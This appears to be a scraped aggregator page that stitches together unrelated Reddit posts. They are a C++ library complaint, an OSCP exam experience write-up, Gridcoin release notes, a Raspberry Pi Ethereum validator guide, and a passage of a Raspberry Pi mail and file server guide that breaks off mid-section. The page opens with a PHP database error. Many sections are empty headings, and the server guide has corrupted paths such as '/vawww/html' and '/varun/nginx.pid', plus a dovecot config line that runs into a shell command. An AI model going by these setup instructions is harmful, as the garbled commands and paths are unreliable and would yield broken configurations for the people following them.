Warning: SQLite3::querySingle(): Unable to prepare statement: 1, no such table: sites in /home/admin/web/local.example.com/public_html/index.php on line 46
 Binarystation Official Site

Binarystation Official Site

A place to help anyone who has a uterus

This sub is dedicated to providing information and resources to those in need of services in states that have passed the heartbeat bill. Please read the info in the sidebar 💖
[link]

Why is it such an abysmal pain to use libraries in C++ compared to pretty much anything else?

I recently realized something that's been annoying me for so long

How to add a library in JavaScript:

How to add a library in C#:

How to add a library in Go:

How to add a library in Rust (And this is so "C++ is compiled" isn't an excuse):

If you install cargo-edit you can alternatively just:

How to add a library in C++:

submitted by scarletkrath to cpp [link] [comments]

Passed OSCP - My Experience

Originally, I was leaning against doing an obligatory post-OSCP Reddit post because I didn’t want to come across as another “look at me - I passed OSCP!!” cringeworthy OSCP Oscar speech, but I decided to go ahead and do one because my experience was perhaps a little unique and answers the much-asked question “can I do OSCP without experience?”.
A quick background to add context…
I’m 31 years old and my employment history is a mixture of sales, graphics, and media-related job roles. I felt discontented for a long time earning (barely) living wage in job roles I had little passion for. Anyway, to cut a long story short, I decided to quit my latest sales job in November last year (2019) to pursue a career in cybersecurity/infosec. I didn’t know what ‘TCP’ or ‘UDP’ was, and I’d never heard of ‘Kali’ or how to run a VM, but I was convinced that this would be the career path for me.
Anyway, I went through Security+ and C|EH from November to March and, just as I was going to start applying for Security Analyst type job roles, our friendly neighbourhood Coronavirus came along and shut down the economy. Even though I had no intention of doing OSCP for another year or two, I thought it was a better option than twiddling my thumbs for a few months, so I decided to sign up for PWK labs and have a crack at it.
Fast-forwarding to yesterday, after a few brutal months and an incredible experience, I finally got the OSCP “you have successfully completed” email.
Apologies in advance for the essay but I just want to go through my journey for those of you that might be in a similar position to the one I was in - limited/zero IT experience and feeling intimidated by the dreaded OSCP mountain.
My journey…
In the weeks leading up to the wait to start my 60 days PWK material and labs, I went through The Cyber Mentor’s Practical Ethical Hacking Udemy course and then went on a Hack the Box rampage, so, by the time my lab time started, I felt like I was in a pretty decent position.
Unfortunately, because I was a naïve idiot, I tackled the labs straight away and went through the PWK PDF casually on the side. This was a big mistake and something I would definitely change in hindsight because it cost me 5 easy points on the exam (I thought I could smash through the PDF exercises during the last week of labs but this didn’t prove to be enough time).
In 60 days I ended up rooting around 40 machines - I didn’t bother going for the networks because it didn’t apply to the exam and, although valuable real-world experience, I didn’t want to get distracted and flood my brain with even more information when it wasn’t going to be relevant for my mission.
One big thing that I did get right was note-taking. I can’t express enough how valuable it is to take detailed notes and build your own cheat sheet library. After every machine I rooted, I did a walkthrough on OneNote and added any new tools/commands to my cheat sheet library. This not only saves precious time in the exam, but it helps you build your own knowledge instead of relying on other people’s cheat sheets without really understanding what you’re doing.
After my 60 days had finished, I spent 1 month on TJ Null’s OSCP Hack the Box list and IppSec’s video walkthroughs. I also can’t stress enough how valuable this learning methodology is. My only regret is that I rushed through it. I’d already booked my exam 30 days after lab time, so I ended up jumping through walkthroughs when I got stuck on boxes instead of exhausting all options. This was another naïve idiot mistake on my behalf and something I would do differently in hindsight. There’s a difference between “trying harder” and “trying harder, but in a smart way”. I was putting 10+ hours in every day but I wasn’t always being efficient with my time. I’d definitely recommend seeking hints and tips on boxes but only after you’ve exhausted all options first, something which I didn’t always do.
Anyway, my first exam attempt came around towards the end of July. Was I ready? No, but I had delusional confidence in myself that has paid off for me more often than not, so I was hoping it would pay off for me again.
My first exam was brutal. I sat in my chair for a total of 23 hours and 15 minutes, with only 3 short 5-minute breaks to get food to snack on. My VPN was shut down after 24 hours and I had a total of 65 points, which I’d been stuck on for the last 8 hours of my exam. I got the BO, root on one of the 20-point machines, root on the 10-point machine, and user on the other 20-point machine. I just couldn’t get root on that last machine.
I was pretty devastated because I’d put my heart and soul into Sec+, C|EH, and OSCP for 7 straight months and I wanted it bad. But my delusional confidence wasn’t enough.
After listening to depressing Taylor Swift songs for a few days (joke), I decided to book another exam in, 4 weeks after my first attempt.
This time around, I decided to go through Tib3rius’s Linux and Windows Privilege Escalation courses (they were great) and go back over some of the HTB machines. I honestly felt at this point that there wasn’t much more study material that I could go through.
2nd exam came up and it was an almost minute-for-minute repeat of the first exam. BO done, 20 point rooted, 10 point rooted, but could only get user on the other 20 point. 65 points again. This time I ended up listening to Taylor Swift + Lana Del Rey.
I was pretty adamant that I could do this and that I was very close, so I sent Off-Sec an email explaining my situation and they were kind enough to allow me another exam attempt without waiting 8 weeks - I booked another exam in 2 weeks after my second attempt.
This time, my preparation was entirely mental. In both my prior exams, I was sat on my chair for over 23 hours because I was flapping around aimlessly like a headless chicken, desperately firing off exploits that I knew wouldn’t work on the other 20-point machine. So, I went into the 3rd exam determined to go at a slow and steady pace, and not let the 24-hour timeframe pressure me into a wild goose chase.
Miraculously, it seemed to work. After 14 hours, I’d done the BO, rooted both 20-point machines, rooted the 10-point machine, and got user on the 25-point machine. 85-ish points in total.
The point of this story is to get across to people that you need to try simpler, not harder. I perhaps failed my first exam because I’d not gone through Tib3rius’s Priv Esc courses, but I failed on my 2nd 100% due to mentality. There was no skill-level difference between my 2nd exam and 3rd exam.
I’ll finish off with my recommended learning methodology and exam tips (for people with limited/zero IT experience):
. The Cyber Mentor Practical Ethical Hacking Udemy course (usually on offer at $14.99-ish)
. Tib3rius’s Linux and Windows Privilege Escalation course (usually on offer at $12.99 each)
. Try Hack Me OSCP Learning Path (I would recommend doing this before HTB - it is $10 for 30 days)
. PWK labs (I personally don’t feel more than 60 days are required - unless you work full-time)
. TJ Null’s OSCP Hack the Box list ($10 for retired HTB machines - very worth it)
. You should be ready for the exam
Exam tips:
. Become proficient with Nmap but use an enumeration tool like nmapAutomator for the exam
. You will need to understand what bash and Python scripts are doing (you don’t need to be able to write them from scratch)
. Don’t be tempted to use a fancy BO methodology for the exam, stick with PWK’s methodology - it works (some of the others don’t)
. Play around with various reverse shell payloads - sometimes a bash one-liner won’t work so you need to go with Python. Sometimes Bash, Python, and netcat won’t work, so you need to understand what alternatives you can use in that scenario
. Get into the habit of reading service manuals. In all 3 of my exams, I came up against machines that had services I’d never even heard of. Fortunately, I’d got into the habit reading service manuals, otherwise, I would have skipped over the services and got lost down a rabbit hole
. Get into the habit of exploiting conventional services in unconventional ways. Just because an SUID binary isn’t on Gtfobins, it doesn’t mean that you can’t exploit the SUID binary in an unconventional way. Again, get into the habit of reading manuals to understand what services do
. Become familiar with Burp Suite. Many exploits won’t work in the way you might expect them to, but they will work if you run them through Burp. Or, at the very least, you’ll be able to understand why they’re not working. This issue came up in my last exam and I would have been completely lost if it weren’t for Burp
. Take breaks if you get frustrated - this is said over and over again by people on this subreddit and it’s an absolute must. The 20 point machine that I couldn’t root after 8 hours on my 2nd exam was on my 3rd exam (thanks Off-Sec - I know you tried to fu*k me with that), but I was able to root it within 1 hour on my 3rd exam, simply because my mindset was different at the time.
. Trust your gut - by doing PWK and HTB machines, you should develop a gut feeling of when you are in a rabbit hole and when you’re on the right track. I ended up rooting over 100 machines before the exam (albeit with plenty of hints and tips) and it helped me develop a good gut feeling. I can’t explain why but there were times in my last exam where I knew I was in the right area even though I wasn’t able to enumerate the specific service version. This feeling simply came from experience. I’m sure many of you watch IppSec’s videos and wonder “how the hell does he know to do X or Y?”. I used to wonder this all the time but after going through dozens of machines, I finally got it. It comes down to experience. Try to do as many machines as you can before the exam to build that gut feeling, and trust it in the exam.
. Embrace failure - this is perhaps the most important thing that I can say. OSCP is a difficult journey and many people fail multiple times before passing. And you know what? That’s okay. It’s okay to fail. It’s how you react to failure that counts. I’m not particularly smart but I embrace failure and I know deep down that I will keep trying until I pass. I was prepared to take the OSCP exam 1000 times if I had to, I was never going to let the exam beat me. I suggest you approach it with the same mentality and not let silly pride prevent you from having a go at it.
One last thing! Join a solid Discord community. This journey has been amazing since day one and a big reason behind that is the amazing online community. I was very active in an HTB community and ended up talking to several people who were going through OSCP at the same time as me. This was honestly such a massive help to me because I didn’t know what the hell I was doing when I first started!
Sorry for the massive rant - I just see so many people on here treating OSCP like an unsurmountable mountain. It’s not. You can do it!
submitted by TheCrypt0nian to oscp [link] [comments]

Go bindings to QuickJS: a fast, small, and embeddable ES2020 JavaScript interpreter.

submitted by lithdew to golang [link] [comments]

Gridcoin 5.0.0.0-Mandatory "Fern" Release

https://github.com/gridcoin-community/Gridcoin-Research/releases/tag/5.0.0.0
Finally! After over ten months of development and testing, "Fern" has arrived! This is a whopper. 240 pull requests merged. Essentially a complete rewrite that was started with the scraper (the "neural net" rewrite) in "Denise" has now been completed. Practically the ENTIRE Gridcoin specific codebase resting on top of the vanilla Bitcoin/Peercoin/Blackcoin vanilla PoS code has been rewritten. This removes the team requirement at last (see below), although there are many other important improvements besides that.
Fern was a monumental undertaking. We had to encode all of the old rules active for the v10 block protocol in new code and ensure that the new code was 100% compatible. This had to be done in such a way as to clear out all of the old spaghetti and ring-fence it with tightly controlled class implementations. We then wrote an entirely new, simplified ruleset for research rewards and reengineered contracts (which includes beacon management, polls, and voting) using properly classed code. The fundamentals of Gridcoin with this release are now on a very sound and maintainable footing, and the developers believe the codebase as updated here will serve as the fundamental basis for Gridcoin's future roadmap.
We have been testing this for MONTHS on testnet in various stages. The v10 (legacy) compatibility code has been running on testnet continuously as it was developed to ensure compatibility with existing nodes. During the last few months, we have done two private testnet forks and then the full public testnet testing for v11 code (the new protocol which is what Fern implements). The developers have also been running non-staking "sentinel" nodes on mainnet with this code to verify that the consensus rules are problem-free for the legacy compatibility code on the broader mainnet. We believe this amount of testing is going to result in a smooth rollout.
Given the amount of changes in Fern, I am presenting TWO changelogs below. One is high level, which summarizes the most significant changes in the protocol. The second changelog is the detailed one in the usual format, and gives you an inkling of the size of this release.

Highlights

Protocol

Note that the protocol changes will not become active until we cross the hard-fork transition height to v11, which has been set at 2053000. Given current average block spacing, this should happen around October 4, about one month from now.
Note that to get all of the beacons in the network on the new protocol, we are requiring ALL beacons to be validated. A two week (14 day) grace period is provided by the code, starting at the time of the transition height, for people currently holding a beacon to validate the beacon and prevent it from expiring. That means that EVERY CRUNCHER must advertise and validate their beacon AFTER the v11 transition (around Oct 4th) and BEFORE October 18th (or more precisely, 14 days from the actual date of the v11 transition). If you do not advertise and validate your beacon by this time, your beacon will expire and you will stop earning research rewards until you advertise and validate a new beacon. This process has been made much easier by a brand new beacon "wizard" that helps manage beacon advertisements and renewals. Once a beacon has been validated and is a v11 protocol beacon, the normal 180 day expiration rules apply. Note, however, that the 180 day expiration on research rewards has been removed with the Fern update. This means that while your beacon might expire after 180 days, your earned research rewards will be retained and can be claimed by advertising a beacon with the same CPID and going through the validation process again. In other words, you do not lose any earned research rewards if you do not stake a block within 180 days and keep your beacon up-to-date.
The transition height is also when the team requirement will be relaxed for the network.

GUI

Besides the beacon wizard, there are a number of improvements to the GUI, including new UI transaction types (and icons) for staking the superblock, sidestake sends, beacon advertisement, voting, poll creation, and transactions with a message. The main screen has been revamped with a better summary section, and better status icons. Several changes under the hood have improved GUI performance. And finally, the diagnostics have been revamped.

Blockchain

The wallet sync speed has been DRASTICALLY improved. A decent machine with a good network connection should be able to sync the entire mainnet blockchain in less than 4 hours. A fast machine with a really fast network connection and a good SSD can do it in about 2.5 hours. One of our goals was to reduce or eliminate the reliance on snapshots for mainnet, and I think we have accomplished that goal with the new sync speed. We have also streamlined the in-memory structures for the blockchain which shaves some memory use.
There are so many goodies here it is hard to summarize them all.
I would like to thank all of the contributors to this release, but especially thank @cyrossignol, whose incredible contributions formed the backbone of this release. I would also like to pay special thanks to @barton2526, @caraka, and @Quezacoatl1, who tirelessly helped during the testing and polishing phase on testnet with testing and repeated builds for all architectures.
The developers are proud to present this release to the community and we believe this represents the starting point for a true renaissance for Gridcoin!

Summary Changelog

Accrual

Changed

Most significantly, nodes calculate research rewards directly from the magnitudes in EACH superblock between stakes instead of using a two- or three- point average based on a CPID's current magnitude and the magnitude for the CPID when it last staked. For those long-timers in the community, this has been referred to as "Superblock Windows," and was first done in proof-of-concept form by @denravonska.

Removed

Beacons

Added

Changed

Removed

Unaltered

As a reminder:

Superblocks

Added

Changed

Removed

Voting

Added

Changed

Removed

Detailed Changelog

[5.0.0.0] 2020-09-03, mandatory, "Fern"

Added

Changed

Removed

Fixed

submitted by jamescowens to gridcoin [link] [comments]

Ethereum on ARM. New Eth2.0 Raspberry Pi 4 image for joining the Medalla multi-client testnet. Step-by-step guide for installing and activating a validator (Prysm, Teku, Lighthouse and Nimbus clients included)

TL;DR: Flash your Raspberry Pi 4, plug in an ethernet cable, connect the SSD disk and power up the device to join the Eth2.0 medalla testnet.
The image takes care of all the necessary steps to join the Eth2.0 Medalla multi-client testnet [1], from setting up the environment and formatting the SSD disk to installing, managing and running the Eth1.0 and Eth2.0 clients.
You will only need to choose an Eth2.0 client, start the beacon chain service and activate / run the validator.
Note: this is an update for our previous Raspberry Pi 4 Eth2 image [2] so some of the instructions are directly taken from there.

MAIN FEATURES

SOFTWARE INCLUDED

INSTALLATION GUIDE AND USAGE

RECOMMENDED HARDWARE AND SETUP
STORAGE
You will need an SSD to run the Ethereum clients (without an SSD drive there’s absolutely no chance of syncing the Ethereum blockchain). There are 2 options:
Use an USB portable SSD disk such as the Samsung T5 Portable SSD.
Use an USB 3.0 External Hard Drive Case with a SSD Disk. In our case we used a Inateck 2.5 Hard Drive Enclosure FE2011. Make sure to buy a case with an UASP compliant chip, particularly, one of these: JMicron (JMS567 or JMS578) or ASMedia (ASM1153E).
In both cases, avoid getting low quality SSD disks as it is a key component of your node and it can drastically affect the performance (and sync times). Keep in mind that you need to plug the disk to an USB 3.0 port (in blue).
IMAGE DOWNLOAD AND INSTALLATION
1.- Download the image:
http://www.ethraspbian.com/downloads/ubuntu-20.04.1-preinstalled-server-arm64+raspi-eth2-medalla.img.zip
SHA256 149cb9b020d1c49fcf75c00449c74c6f38364df1700534b5e87f970080597d87
2.- Flash the image
Insert the microSD in your Desktop / Laptop and download the file.
Note: If you are not comfortable with command line or if you are running Windows, you can use Etcher [10]
Open a terminal and check your MicroSD device name running:
sudo fdisk -l
You should see a device named mmcblk0 or sdd. Unzip and flash the image:
unzip ubuntu-20.04.1-preinstalled-server-arm64+raspi-eth2-medalla.img.zip
sudo dd bs=1M if=ubuntu-20.04.1-preinstalled-server-arm64+raspi.img of=/dev/mmcblk0 conv=fdatasync status=progress
3.- Insert de MicroSD into the Raspberry Pi 4. Connect an Ethernet cable and attach the USB SSD disk (make sure you are using a blue port).
4.- Power on the device
The Ubuntu OS will boot up in less than one minute but you will need to wait approximately 7-8 minutes in order to allow the script to perform the necessary tasks to install the Medalla setup (it will reboot again)
5.- Log in
You can log in through SSH or using the console (if you have a monitor and keyboard attached)
User: ethereum Password: ethereum 
You will be prompted to change the password on first login, so you will need to log in twice.
6.- Forward 30303 port in your router (both UDP and TCP). If you don’t know how to do this, google “port forwarding” followed by your router model. You will need to open additional ports as well depending on the Eth2.0 client you’ve chosen.
7.- Getting console output
You can see what’s happening in the background by typing:
sudo tail -f /valog/syslog
8.- Grafana Dashboards
There are 5 Grafana dashboards available to monitor the Medalla node (see section “Grafana Dashboards” below).

The Medalla Eth2.0 multi-client testnet

Medalla is the official Eth2.0 multi-client testnet according to the latest official specification for Eth2.0, the v0.12.2 [11] release (which is aimed to be the final) [12].
In order to run a Medalla Eth 2.0 node you will need 3 components:
The image takes care of the Eth1.0 setup. So, once flashed (and after a first reboot), Geth (Eth1.0 client) starts to sync the Goerli testnet.
Follow these steps to enable your Eth2.0 Ethereum node:
CREATE THE VALIDATOR KEYS AND MAKE THE DEPOSIT
We need to get 32 Goerli ETH (fake ETH) ir order to make the deposit in the Eth2.0 contract and run the validator. The easiest way of getting ETH is by joining Prysm Discord's channel.
Open Metamask [14], select the Goerli Network (top of the window) and copy your ETH Address. Go to:
https://discord.com/invite/YMVYzv6
And open the “request-goerli-eth” channel (on the left)
Type:
!send $YOUR_ETH_ADDRESS (replace it with the one copied on Metamask)
You will receive enough ETH to run 1 validator.
Now it is time to create your validator keys and the deposit information. For your convenience we’ve packaged the official Eth2 launchpad tool [4]. Go to the EF Eth2.0 launchpad site:
https://medalla.launchpad.ethereum.org/
And click “Get started”
Read and accept all warnings. In the next screen, select 1 validator and go to your Raspberry Pi console. Under the ethereum account run:
cd && deposit --num_validators 1 --chain medalla
Choose your mnemonic language and type a password for keeping your keys safe. Write down your mnemonic password, press any key and type it again as requested.
Now you have 2 Json files under the validator_keys directory. A deposit data file for sending the 32 ETH along with your validator public key to the Eth1 chain (goerli testnet) and a keystore file with your validator keys.
Back to the Launchpad website, check "I am keeping my keys safe and have written down my mnemonic phrase" and click "Continue".
It is time to send the 32 ETH deposit to the Eth1 chain. You need the deposit file (located in your Raspberry Pi). You can, either copy and paste the file content and save it as a new file in your desktop or copy the file from the Raspberry to your desktop through SSH.
1.- Copy and paste: Connected through SSH to your Raspberry Pi, type:
cat validator_keys/deposit_data-$FILE-ID.json (replace $FILE-ID with yours)
Copy the content (the text in square brackets), go back to your desktop, paste it into your favourite editor and save it as a json file.
Or
2.- Ssh: From your desktop, copy the file:
scp ethereum@$YOUR_RASPBERRYPI_IP:/home/ethereum/validator_keys/deposit_data-$FILE_ID.json /tmp
Replace the variables with your data. This will copy the file to your desktop /tmp directory.
Upload the deposit file
Now, back to the Launchpad website, upload the deposit_data file and select Metamask, click continue and check all warnings. Continue and click “Initiate the Transaction”. Confirm the transaction in Metamask and wait for the confirmation (a notification will pop up shortly).
The Beacon Chain (which is connected to the Eth1 chain) will detect this deposit (that includes the validator public key) and the Validator will be enabled.
Congrats!, you just started your validator activation process.
CHOOSE AN ETH2.0 CLIENT
Time to choose your Eth2.0 client. We encourage you to run Lighthouse, Teku or Nimbus as Prysm is the most used client by far and diversity is key to achieve a resilient and healthy Eth2.0 network.
Once you have decided which client to run (as said, try to run one with low network usage), you need to set up the clients and start both, the beacon chain and the validator.
These are the instructions for enabling each client (Remember, choose just one Eth2.0 client out of 4):
LIGHTHOUSE ETH2.0 CLIENT
1.- Port forwarding
You need to open the 9000 port in your router (both UDP and TCP)
2.- Start the beacon chain
Under the ethereum account, run:
sudo systemctl enable lighthouse-beacon
sudo systemctl start lighthouse-beacon
3.- Start de validator
We need to import the validator keys. Run under the ethereum account:
lighthouse account validator import --directory=/home/ethereum/validator_keys
Then, type your previously defined password and run:
sudo systemctl enable lighthouse-validator
sudo systemctl start lighthouse-validator
The Lighthouse beacon chain and validator are now enabled

PRYSM ETH2.0 CLIENT
1.- Port forwarding
You need to open the 13000 and 12000 ports in your router (both UDP and TCP)
2.- Start the beacon chain
Under the ethereum account, run:
sudo systemctl enable prysm-beacon
sudo systemctl start prysm-beacon
3.- Start de validator
We need to import the validator keys. Run under the ethereum account:
validator accounts-v2 import --keys-dir=/home/ethereum/validator_keys
Accept the default wallet path and enter a password for your wallet. Now enter the password previously defined.
Lastly, set up your password and start the client:
echo "$YOUR_PASSWORD" > /home/ethereum/validator_keys/prysm-password.txt
sudo systemctl enable prysm-validator
sudo systemctl start prysm-validator
The Prysm beacon chain and the validator are now enabled.

TEKU ETH2.0 CLIENT
1.- Port forwarding
You need to open the 9151 port (both UDP and TCP)
2.- Start the Beacon Chain and the Validator
Under the Ethereum account, check the name of your keystore file:
ls /home/ethereum/validator_keys/keystore*
Set the keystore file name in the teku config file (replace the $KEYSTORE_FILE variable with the file listed above)
sudo sed -i 's/changeme/$KEYSTORE_FILE/' /etc/ethereum/teku.conf
Set the password previously entered:
echo "yourpassword" > validator_keys/teku-password.txt
Start the beacon chain and the validator:
sudo systemctl enable teku
sudo systemctl start teku
The Teku beacon chain and validator are now enabled.

NIMBUS ETH2.0 CLIENT
1.- Port forwarding
You need to open the 19000 port (both UDP and TCP)
2.- Start the Beacon Chain and the Validator
We need to import the validator keys. Run under the ethereum account:
beacon_node deposits import /home/ethereum/validator_keys --data-dir=/home/ethereum/.nimbus --log-file=/home/ethereum/.nimbus/nimbus.log
Enter the password previously defined and run:
sudo systemctl enable nimbus
sudo systemctl start nimbus
The Nimbus beacon chain and validator are now enabled.

WHAT's NEXT
Now you need to wait for the Eth1 blockchain and the beacon chain to get synced. In a few hours the validator will get enabled and put into a queue. These are the validator status that you will see until its final activation:
Finally, it will get activated and the staking process will start.
Congratulations!, you join the Medalla Eth2.0 multiclient testnet!

Grafana Dashboards

We configured 5 Grafana Dashboards to let users monitor both Eth1.0 and Eth2.0 clients. To access the dashboards just open your browser and type your Raspberry IP followed by the 3000 port:
http://replace_with_your_IP:3000 user: admin passwd: ethereum 
There are 5 dashboards available:
Lots of info here. You can see for example if Geth is in sync by checking (in the Blockchain section) if Headers, Receipts and Blocks fields are aligned or find Eth2.0 chain info.

Updating the software

We will be keeping the Eth2.0 clients updated through Debian packages in order to keep up with the testnet progress. Basically, you need to update the repo and install the packages through the apt command. For instance, in order to update all packages you would run:
sudo apt-get update && sudo apt-get install geth teku nimbus prysm-beacon prysm-validator lighthouse-beacon lighthouse-validator
Please follow us on Twitter in order to get regular updates and install instructions.
https://twitter.com/EthereumOnARM

References

  1. https://github.com/goerli/medalla/tree/mastemedalla
  2. https://www.reddit.com/ethereum/comments/hhvi2ethereum_on_arm_new_eth20_raspberry_pi_4_image/
  3. https://github.com/ethereum/go-ethereum/releases/tag/v1.9.20
  4. https://github.com/ethereum/eth2.0-deposit-cli/releases
  5. https://github.com/prysmaticlabs/prysm/releases/tag/v1.0.0-alpha.23
  6. https://github.com/PegaSysEng/teku
  7. https://github.com/sigp/lighthouse/releases/tag/v0.2.8
  8. https://github.com/status-im/nim-beacon-chain
  9. https://grafana.com
  10. https://www.balena.io/etcher
  11. https://github.com/ethereum/eth2.0-specs/releases/tag/v0.12.2
  12. https://blog.ethereum.org/2020/08/03/eth2-quick-update-no-14
  13. https://goerli.net
  14. https://metamask.io
submitted by diglos76 to ethereum [link] [comments]

NASPi: a Raspberry Pi Server

In this guide I will cover how to set up a functional server providing: mailserver, webserver, file sharing server, backup server, monitoring.
For this project a dynamic domain name is also needed. If you don't want to spend money for registering a domain name, you can use services like dynu.com, or duckdns.org. Between the two, I prefer dynu.com, because you can set every type of DNS record (TXT records are only available after 30 days, but that's worth not spending ~15€/year for a domain name), needed for the mailserver specifically.
Also, I highly suggest you to take a read at the documentation of the software used, since I cannot cover every feature.

Hardware


Software

(minor utilities not included)

Guide

First thing first we need to flash the OS to the SD card. The Raspberry Pi imager utility is very useful and simple to use, and supports any type of OS. You can download it from the Raspberry Pi download page. As of August 2020, the 64-bit version of Raspberry Pi OS is still in the beta stage, so I am going to cover the 32-bit version (but with a 64-bit kernel, we'll get to that later).
Before moving on and powering on the Raspberry Pi, add a file named ssh in the boot partition. Doing so will enable the SSH interface (disabled by default). We can now insert the SD card into the Raspberry Pi.
Once powered on, we need to attach it to the LAN, via an Ethernet cable. Once done, find the IP address of your Raspberry Pi within your LAN. From another computer we will then be able to SSH into our server, with the user pi and the default password raspberry.

raspi-config

Using this utility, we will set a few things. First of all, set a new password for the pi user, using the first entry. Then move on to changing the hostname of your server, with the network entry (for this tutorial we are going to use naspi). Set the locale, the time-zone, the keyboard layout and the WLAN country using the fourth entry. At last, enable SSH by default with the fifth entry.

64-bit kernel

As previously stated, we are going to take advantage of the 64-bit processor the Raspberry Pi 4 has, even with a 32-bit OS. First, we need to update the firmware, then we will tweak some config.
$ sudo rpi-update
$ sudo nano /boot/config.txt
arm64bit=1 
$ sudo reboot

swap size

With my 2 GB version I encountered many RAM problems, so I had to increase the swap space to mitigate the damages caused by the OOM killer.
$ sudo dphys-swapfiles swapoff
$ sudo nano /etc/dphys-swapfile
CONF_SWAPSIZE=1024 
$ sudo dphys-swapfile setup
$ sudo dphys-swapfile swapon
Here we are increasing the swap size to 1 GB. According to your setup you can tweak this setting to add or remove swap. Just remember that every time you modify this parameter, you'll empty the partition, moving every bit from swap to RAM, eventually calling in the OOM killer.

APT

In order to reduce resource usage, we'll set APT to avoid installing recommended and suggested packages.
$ sudo nano /etc/apt/apt.config.d/01noreccomend
APT::Install-Recommends "0"; APT::Install-Suggests "0"; 

Update

Before starting installing packages we'll take a moment to update every already installed component.
$ sudo apt update
$ sudo apt full-upgrade
$ sudo apt autoremove
$ sudo apt autoclean
$ sudo reboot

Static IP address

For simplicity sake we'll give a static IP address for our server (within our LAN of course). You can set it using your router configuration page or set it directly on the Raspberry Pi.
$ sudo nano /etc/dhcpcd.conf
interface eth0 static ip_address=192.168.0.5/24 static routers=192.168.0.1 static domain_name_servers=192.168.0.1 
$ sudo reboot

Emailing

The first feature we'll set up is the mailserver. This is because the iRedMail script works best on a fresh installation, as recommended by its developers.
First we'll set the hostname to our domain name. Since my domain is naspi.webredirect.org, the domain name will be mail.naspi.webredirect.org.
$ sudo hostnamectl set-hostname mail.naspi.webredirect.org
$ sudo nano /etc/hosts
127.0.0.1 mail.webredirect.org localhost ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6allrouters 127.0.1.1 naspi 
Now we can download and setup iRedMail
$ sudo apt install git
$ cd /home/pi/Documents
$ sudo git clone https://github.com/iredmail/iRedMail.git
$ cd /home/pi/Documents/iRedMail
$ sudo chmod +x iRedMail.sh
$ sudo bash iRedMail.sh
Now the script will guide you through the installation process.
When asked for the mail directory location, set /vavmail.
When asked for webserver, set Nginx.
When asked for DB engine, set MariaDB.
When asked for, set a secure and strong password.
When asked for the domain name, set your, but without the mail. subdomain.
Again, set a secure and strong password.
In the next step select Roundcube, iRedAdmin and Fail2Ban, but not netdata, as we will install it in the next step.
When asked for, confirm your choices and let the installer do the rest.
$ sudo reboot
Once the installation is over, we can move on to installing the SSL certificates.
$ sudo apt install certbot
$ sudo certbot certonly --webroot --agree-tos --email youremail@something.com -d mail.naspi.webredirect.org -w /vawww/html/
$ sudo nano /etc/nginx/templates/ssl.tmpl
ssl_certificate /etc/letsencrypt/live/mail.naspi.webredirect.org/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/mail.naspi.webredirect.org/privkey.pem; 
$ sudo service nginx restart
$ sudo nano /etc/postfix/main.cf
smtpd_tls_key_file = /etc/letsencrypt/live/mail.naspi.webredirect.org/privkey.pem; smtpd_tls_cert_file = /etc/letsencrypt/live/mail.naspi.webredirect.org/cert.pem; smtpd_tls_CAfile = /etc/letsencrypt/live/mail.naspi.webredirect.org/chain.pem; 
$ sudo service posfix restart
$ sudo nano /etc/dovecot/dovecot.conf
ssl_cert =  $ sudo service dovecot restart
Now we have to tweak some Nginx settings in order to not interfere with other services.
$ sudo nano /etc/nginx/sites-available/90-mail
server { listen 443 ssl http2; server_name mail.naspi.webredirect.org; root /vawww/html; index index.php index.html include /etc/nginx/templates/misc.tmpl; include /etc/nginx/templates/ssl.tmpl; include /etc/nginx/templates/iredadmin.tmpl; include /etc/nginx/templates/roundcube.tmpl; include /etc/nginx/templates/sogo.tmpl; include /etc/nginx/templates/netdata.tmpl; include /etc/nginx/templates/php-catchall.tmpl; include /etc/nginx/templates/stub_status.tmpl; } server { listen 80; server_name mail.naspi.webredirect.org; return 301 https://$host$request_uri; } 
$ sudo ln -s /etc/nginx/sites-available/90-mail /etc/nginx/sites-enabled/90-mail
$ sudo rm /etc/nginx/sites-*/00-default*
$ sudo nano /etc/nginx/nginx.conf
user www-data; worker_processes 1; pid /varun/nginx.pid; events { worker_connections 1024; } http { server_names_hash_bucket_size 64; include /etc/nginx/conf.d/*.conf; include /etc/nginx/conf-enabled/*.conf; include /etc/nginx/sites-enabled/*; } 
$ sudo service nginx restart

.local domain

If you want to reach your server easily within your network you can set the .local domain to it. To do so you simply need to install a service and tweak the firewall settings.
$ sudo apt install avahi-daemon
$ sudo nano /etc/nftables.conf
# avahi udp dport 5353 accept 
$ sudo service nftables restart
When editing the nftables configuration file, add the above lines just below the other specified ports, within the chain input block. This is needed because avahi communicates via the 5353 UDP port.

RAID 1

At this point we can start setting up the disks. I highly recommend you to use two or more disks in a RAID array, to prevent data loss in case of a disk failure.
We will use mdadm, and suppose that our disks will be named /dev/sda1 and /dev/sdb1. To find out the names issue the sudo fdisk -l command.
$ sudo apt install mdadm
$ sudo mdadm --create -v /dev/md/RED -l 1 --raid-devices=2 /dev/sda1 /dev/sdb1
$ sudo mdadm --detail /dev/md/RED
$ sudo -i
$ mdadm --detail --scan >> /etc/mdadm/mdadm.conf
$ exit
$ sudo mkfs.ext4 -L RED -m .1 -E stride=32,stripe-width=64 /dev/md/RED
$ sudo mount /dev/md/RED /NAS/RED
The filesystem used is ext4, because it's the fastest. The RAID array is located at /dev/md/RED, and mounted to /NAS/RED.

fstab

To automount the disks at boot, we will modify the fstab file. Before doing so you will need to know the UUID of every disk you want to mount at boot. You can find out these issuing the command ls -al /dev/disk/by-uuid.
$ sudo nano /etc/fstab
# Disk 1 UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx /NAS/Disk1 ext4 auto,nofail,noatime,rw,user,sync 0 0 
For every disk add a line like this. To verify the functionality of fstab issue the command sudo mount -a.

S.M.A.R.T.

To monitor your disks, the S.M.A.R.T. utilities are a super powerful tool.
$ sudo apt install smartmontools
$ sudo nano /etc/defaults/smartmontools
start_smartd=yes 
$ sudo nano /etc/smartd.conf
/dev/disk/by-uuid/UUID -a -I 190 -I 194 -d sat -d removable -o on -S on -n standby,48 -s (S/../.././04|L/../../1/04) -m yourmail@something.com 
$ sudo service smartd restart
For every disk you want to monitor add a line like the one above.
About the flags:
· -a: full scan.
· -I 190, -I 194: ignore the 190 and 194 parameters, since those are the temperature value and would trigger the alarm at every temperature variation.
· -d sat, -d removable: removable SATA disks.
· -o on: offline testing, if available.
· -S on: attribute saving, between power cycles.
· -n standby,48: check the drives every 30 minutes (default behavior) only if they are spinning, or after 24 hours of delayed checks.
